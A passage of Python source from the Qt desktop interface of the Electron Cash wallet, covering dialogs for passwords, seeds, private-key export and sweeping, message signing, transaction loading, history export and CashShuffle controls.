text="<center><b>{}</b><br><small>{}</small></center>".format(_("Update Available"),_("Click for details")),
target=self.update_available_button,
timeout=20000, onClick=self.update_available_button.click,
onRightClick=self.update_available_button.click,
dark_mode = ColorScheme.dark_scheme)
else:
# Immediately kills any extant labels
KillPopupLabel(lblName)
def update_lock_icon(self):
icon = QIcon(":icons/lock.svg") if self.wallet.has_password() else QIcon(":icons/unlock.svg")
tip = _('Wallet Password') + ' - '
tip += _('Enabled') if self.wallet.has_password() else _('Disabled')
self.password_button.setIcon(icon)
self.password_button.setStatusTip(tip)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only() and not self.payto_e.cointext)
self.preview_button.setVisible(not self.payto_e.cointext)
self.cointext_button.setVisible(bool(self.payto_e.cointext))
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self.top_level_window(), self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
run_hook("on_new_password", self, password, new_password)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self.top_level_window(), _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self.top_level_window(), _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton()
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path) # implicitly also calls stop_wallet
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
self.close()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self.top_level_window(), seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
d.setParent(None) # Help Python GC this sooner rather than later
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self.top_level_window(), _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton()
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script().hex())
rds_e.addCopyButton()
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electron Cash, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
if addr.kind != addr.ADDR_P2PKH:
self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' + self.msg_sign)
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
task = partial(self.wallet.sign_message, addr, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip())
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
message = message.toPlainText().strip().encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_ui_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
if not isinstance(pubkey, str):
pubkey = pubkey.to_ui_string()
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
return PasswordDialog(parent, msg).run()
def tx_from_text(self, txt):
from electroncash.transaction import tx_from_str
try:
txt_tx = tx_from_str(txt)
tx = Transaction(txt_tx, sign_schnorr=self.wallet.is_schnorr_enabled())
tx.deserialize()
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [vin['prevout_hash'] + ':' + str(vin['prevout_n']) for vin in my_coins]
for i, txin in enumerate(tx.inputs()):
outpoint = txin['prevout_hash'] + ':' + str(txin['prevout_n'])
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
tx._inputs[i]['value'] = my_coins[my_index]['value']
return tx
except:
traceback.print_exc(file=sys.stdout)
self.show_critical(_("Electron Cash was unable to parse your transaction"))
return
# Due to the asynchronous nature of the qr reader we need to keep the
# dialog instance as a member variable to prevent reentrancy/multiple ones
# from being presented at once.
_qr_dialog = None
def read_tx_from_qrcode(self):
if self._qr_dialog:
# Re-entrancy prevention -- there is some lag between when the user
# taps the QR button and the modal dialog appears. We want to
# prevent multiple instances of the dialog from appearing, so we
# must do this.
self.print_error("Warning: QR dialog is already presented, ignoring.")
return
if self.gui_object.warn_if_cant_import_qrreader(self):
return
from electroncash import get_config
from .qrreader import QrReaderCameraDialog
data = ''
self._qr_dialog = None
try:
self._qr_dialog = QrReaderCameraDialog(parent=self.top_level_window())
def _on_qr_reader_finished(success: bool, error: str, result):
if self._qr_dialog:
self._qr_dialog.deleteLater(); self._qr_dialog = None
if not success:
if error:
self.show_error(error)
return
if not result:
return
# if the user scanned a bitcoincash URI
if result.lower().startswith(networks.net.CASHADDR_PREFIX + ':'):
self.pay_to_URI(result)
return
# else if the user scanned an offline signed tx
try:
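# Raw transactions are carried in QR codes as base43 rather than hex, presumably because
# base43 fits the QR alphanumeric character set and yields denser codes; decode back here.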
result = bh2u(bitcoin.base_decode(result, length=None, base=43))
tx = self.tx_from_text(result) # will show an error dialog on error
if not tx:
return
except BaseException as e:
self.show_error(str(e))
return
self.show_transaction(tx)
self._qr_dialog.qr_finished.connect(_on_qr_reader_finished)
self._qr_dialog.start_scan(get_config().get_video_device())
except BaseException as e:
if util.is_verbose:
import traceback
traceback.print_exc()
self._qr_dialog = None
self.show_error(str(e))
def read_tx_from_file(self, *, fileName = None):
fileName = fileName or self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r", encoding='utf-8') as f:
file_content = f.read()
file_content = file_content.strip()
tx_file_dict = json.loads(str(file_content))
except (ValueError, IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
tx = self.tx_from_text(file_content)
return tx
def do_process_from_text(self):
from electroncash.transaction import SerializationError
text = text_dialog(self.top_level_window(), _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self, *, fileName = None):
from electroncash.transaction import SerializationError
try:
tx = self.read_tx_from_file(fileName=fileName)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self, *, txid=None, parent=None):
parent = parent or self
if self.gui_object.warn_if_no_network(parent):
return
from electroncash import transaction
ok = txid is not None
if not ok:
txid, ok = QInputDialog.getText(parent, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
ok, r = self.network.get_raw_tx_for_txid(txid, timeout=10.0)
if not ok:
parent.show_message(_("Error retrieving transaction") + ":\n" + r)
return
tx = transaction.Transaction(r, sign_schnorr=self.wallet.is_schnorr_enabled()) # note that presumably the tx is already signed if it comes from blockchain so this sign_schnorr parameter is superfluous, but here to satisfy my OCD -Calin
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self.top_level_window(), _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electron-cash-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
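            # Runs in a worker thread: export each key (or 'INVALID_PASSWORD' on failure),
            # emitting computing_privkeys_signal per address and show_privkeys_signal once done.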
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
try:
privkey = self.wallet.export_private_key(addr, password)
except InvalidPassword:
# See #921 -- possibly a corrupted wallet or other strangeness
privkey = 'INVALID_PASSWORD'
private_keys[addr.to_ui_string()] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join('{}\t{}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText(_("Please wait... {num}/{total}").format(num=len(private_keys),total=len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
res = d.exec_()
d.setParent(None) # for python GC
if not res:
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electron Cash was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+", encoding='utf-8') as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
data = f.read()
data = json.loads(data)
if type(data) is not dict or not len(data) or not all(type(v) is str and type(k) is str for k,v in data.items()):
self.show_critical(_("The file you selected does not appear to contain labels."))
return
for key, value in data.items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
self.utxo_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electron-cash_labels.json', "*.json")
if fileName:
with open(fileName, 'w+', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self.top_level_window(), _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electron-cash-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
res = d.exec_()
d.setParent(None) # for python GC
if not res:
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electron Cash was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
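        # Writes the wallet history either as CSV rows (optionally with fiat_value_<ccy> /
        # fiat_balance_<ccy> columns) or as JSON (with a per-entry fiat_currency when fiat is enabled).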
history = wallet.export_history(fx=self.fx)
ccy = (self.fx and self.fx.get_currency()) or ''
has_fiat_columns = history and self.fx and self.fx.show_history() and 'fiat_value' in history[0] and 'fiat_balance' in history[0]
lines = []
for item in history:
if is_csv:
cols = [item['txid'], item.get('label', ''), item['confirmations'], item['value'], item['date']]
if has_fiat_columns:
cols += [item['fiat_value'], item['fiat_balance']]
lines.append(cols)
else:
if has_fiat_columns and ccy:
item['fiat_currency'] = ccy # add the currency to each entry in the json. this wastes space but json is bloated anyway so this won't hurt too much, we hope
elif not has_fiat_columns:
# No need to include these fields as they will always be 'No Data'
item.pop('fiat_value', None)
item.pop('fiat_balance', None)
lines.append(item)
with open(fileName, "w+", encoding="utf-8") as f: # ensure encoding to utf-8. Avoid Windows cp1252. See #1453.
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
cols = ["transaction_hash","label", "confirmations", "value", "timestamp"]
if has_fiat_columns:
cols += [f"fiat_value_{ccy}", f"fiat_balance_{ccy}"] # in CSV mode, we use column names eg fiat_value_USD, etc
transaction.writerow(cols)
for line in lines:
transaction.writerow(line)
else:
f.write(json.dumps(lines, indent=4))
def sweep_key_dialog(self):
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self.top_level_window(), title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
bip38_warn_label = QLabel(_("<b>BIP38 support is disabled because a requisite library is not installed.</b> Please install 'cryptodomex' or omit BIP38 private keys (private keys starting in 6P...). Decrypt keys to WIF format (starting with 5, K, or L) in order to sweep."))
bip38_warn_label.setWordWrap(True)
bip38_warn_label.setHidden(True)
vbox.addWidget(bip38_warn_label)
extra = ""
if bitcoin.is_bip38_available():
extra += " " + _('or BIP38 keys')
vbox.addWidget(QLabel(_("Enter private keys") + extra + " :"))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText(), allow_bip38=True)
def has_bip38_keys_but_no_bip38():
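            # True only when the user entered BIP38 keys but BIP38 decryption support is unavailable.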
if bitcoin.is_bip38_available():
return False
keys = [k for k in keys_e.toPlainText().split() if k]
return any(bitcoin.is_bip38_key(k) for k in keys)
def enable_sweep():
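            # Enable the Sweep button only when a destination address and valid keys are present;
            # show the BIP38 warning label if BIP38 keys were entered without BIP38 support.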
bad_bip38 = has_bip38_keys_but_no_bip38()
sweepok = bool(get_address_text() and not bad_bip38 and get_priv_keys())
sweep_button.setEnabled(sweepok)
bip38_warn_label.setHidden(not bad_bip38)
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
res = d.exec_()
d.setParent(None)
if not res:
return
try:
self.do_clear()
keys = get_priv_keys()
bip38s = {}
for i, k in enumerate(keys):
if bitcoin.is_bip38_key(k):
bip38s[k] = i
if bip38s:
# For all the BIP38s detected, prompt for password
from .bip38_importer import Bip38Importer
d2 = Bip38Importer(bip38s.keys(), parent=self.top_level_window())
d2.exec_()
d2.setParent(None)
if d2.decoded_keys:
for k,tup in d2.decoded_keys.items():
wif, adr = tup
# rewrite the keys they specified with the decrypted WIF in the keys list for sweep_preparations to work below...
i = bip38s[k]
keys[i] = wif
else:
self.show_message(_("User cancelled"))
return
coins, keypairs = sweep_preparations(keys, self.network)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except BaseException as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self.top_level_window(), title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad, bad_info = [], []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
bad_info.append("{}: {}".format(key, str(e)))
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_warning(_("The following could not be imported") + ':\n' + '\n'.join(bad), detail_text='\n\n'.join(bad_info))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
if bitcoin.is_bip38_available():
msg += " " + _('or BIP38 keys')
def func(key):
if bitcoin.is_bip38_available() and bitcoin.is_bip38_key(key):
from .bip38_importer import Bip38Importer
d = Bip38Importer([key], parent=self.top_level_window(),
message = _('A BIP38 key was specified, please enter a password to decrypt it'),
show_count = False)
d.exec_()
d.setParent(None) # python GC quicker if this happens
if d.decoded_keys:
wif, adr = d.decoded_keys[key]
return self.wallet.import_private_key(wif, password)
else:
raise util.UserCancelled()
else:
return self.wallet.import_private_key(key, password)
self._do_import(title, msg, func)
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def cashaddr_icon(self):
if self.gui_object.is_cashaddr():
return QIcon(":icons/tab_converter.svg")
else:
return QIcon(":icons/tab_converter_bw.svg")
def cashaddr_status_tip(self):
if self.gui_object.is_cashaddr():
return _('Address Format') + ' - ' + _('CashAddr')
else:
return _('Address Format') + ' - ' + _('Legacy')
def update_cashaddr_icon(self):
self.addr_converter_button.setIcon(self.cashaddr_icon())
self.addr_converter_button.setStatusTip(self.cashaddr_status_tip())
def toggle_cashaddr_status_bar(self):
self.gui_object.toggle_cashaddr()
self.statusBar().showMessage(self.cashaddr_status_tip(), 2000)
def toggle_cashaddr_settings(self, state):
self.gui_object.toggle_cashaddr(state == Qt.Checked)
def toggle_cashaddr(self, on):
self.print_error('*** WARNING ElectrumWindow.toggle_cashaddr: This function is deprecated. Please do not call it!')
self.gui_object.toggle_cashaddr(on)
def cashshuffle_plugin_if_loaded(self):
return self.gui_object.plugins.get_internal_plugin("shuffle", force_load = False)
def is_cashshuffle_enabled(self):
plugin = self.cashshuffle_plugin_if_loaded()
return bool(plugin and plugin.is_enabled() and plugin.window_has_cashshuffle(self))
def cashshuffle_icon(self):
if self.is_cashshuffle_enabled():
if self._cash_shuffle_flag == 1:
return QIcon(":icons/cashshuffle_on_error.svg")
else:
return QIcon(":icons/cashshuffle_on.svg")
else:
self._cash_shuffle_flag = 0
return QIcon(":icons/cashshuffle_off.svg")
def update_cashshuffle_icon(self):
self.cashshuffle_status_button.setIcon(self.cashshuffle_icon())
loaded = bool(self.cashshuffle_plugin_if_loaded())
en = self.is_cashshuffle_enabled()
if self._cash_shuffle_flag == 0:
self.cashshuffle_status_button.setStatusTip(_("CashShuffle") + " - " + _("ENABLED") if en else _("CashShuffle") + " - " + _("Disabled"))
rcfcm = _("Right-click for context menu")
self.cashshuffle_status_button.setToolTip(
(_("Toggle CashShuffle") + "\n" + rcfcm)
#(_("Left-click to view pools") + "\n" + rcfcm) if en
#else (_("Toggle CashShuffle") + "\n" + rcfcm)
)
self.cashshuffle_toggle_action.setText(_("Enable CashShuffle") if not en else _("Disable CashShuffle"))
self.cashshuffle_settings_action.setText(_("CashShuffle Settings..."))
self.cashshuffle_viewpools_action.setEnabled(True)
elif self._cash_shuffle_flag == 1: # Network server error
self.cashshuffle_status_button.setStatusTip(_('CashShuffle Error: Could not connect to server'))
self.cashshuffle_status_button.setToolTip(_('Right-click to select a different CashShuffle server'))
self.cashshuffle_settings_action.setText(_("Resolve Server Problem..."))
self.cashshuffle_viewpools_action.setEnabled(False)
self.cashshuffle_settings_action.setVisible(en or loaded)
self.cashshuffle_viewpools_action.setVisible(en)
if en:
# ensure 'Disable CashShuffle' appears at the end of the context menu
self.cashshuffle_status_button.removeAction(self.cashshuffle_separator_action)
self.cashshuffle_status_button.removeAction(self.cashshuffle_toggle_action)
self.cashshuffle_status_button.addAction(self.cashshuffle_separator_action)
self.cashshuffle_status_button.addAction(self.cashshuffle_toggle_action)
else:
# ensure 'Enable CashShuffle' appears at the beginning of the context menu
self.cashshuffle_status_button.removeAction(self.cashshuffle_separator_action)
self.cashshuffle_status_button.removeAction(self.cashshuffle_toggle_action)
actions = self.cashshuffle_status_button.actions()
self.cashshuffle_status_button.insertAction(actions[0] if actions else None, self.cashshuffle_separator_action)
self.cashshuffle_status_button.insertAction(self.cashshuffle_separator_action, self.cashshuffle_toggle_action)
def show_cashshuffle_settings(self):
p = self.cashshuffle_plugin_if_loaded()
if p:
msg = None
if self._cash_shuffle_flag == 1:
# had error
msg = _("There was a problem connecting to this server.\nPlease choose a different CashShuffle server.")
p.settings_dialog(self, msg)
#else: # commented-out. Enable this if you want to use the non-modal network settings as the destination for this action
# # no error -- use the free-floating non-modal network dialog
# if not p.show_cashshuffle_tab_in_network_dialog(self):
# # Huh. Network dialog creation/show failed. Fall back to modal window
# p.settings_dialog(self, msg)
def show_cashshuffle_pools(self):
p = self.cashshuffle_plugin_if_loaded()
if p:
p.view_pools(self)
def cashshuffle_icon_leftclick(self):
self.toggle_cashshuffle()
return
# delete the above 2 lines if we want the left-click to revert to
# Josh's suggestion (leaving the code in here for now)
if self.is_cashshuffle_enabled():
if self._cash_shuffle_flag != 0:
# Jump to settings.
self.cashshuffle_settings_action.trigger()
return
if self.cashshuffle_viewpools_action.isVisible():
# New! We just let this icon be the "View pools..." action when
# the plugin is already loaded and enabled. This hopefully will
# discourage disabling. Also it's been found that "View pools..."
# is the most popular action anyway -- might as well make it
# convenient to access with 1-click. (@zquestz suggested this)
self.cashshuffle_viewpools_action.trigger()
return
#else... in all other cases just toggle cashshuffle
self.toggle_cashshuffle()
def toggle_cashshuffle(self):
if not self.is_wallet_cashshuffle_compatible():
self.show_warning(_("This wallet type cannot be used with CashShuffle."), parent=self)
return
plugins = self.gui_object.plugins
p0 = self.cashshuffle_plugin_if_loaded()
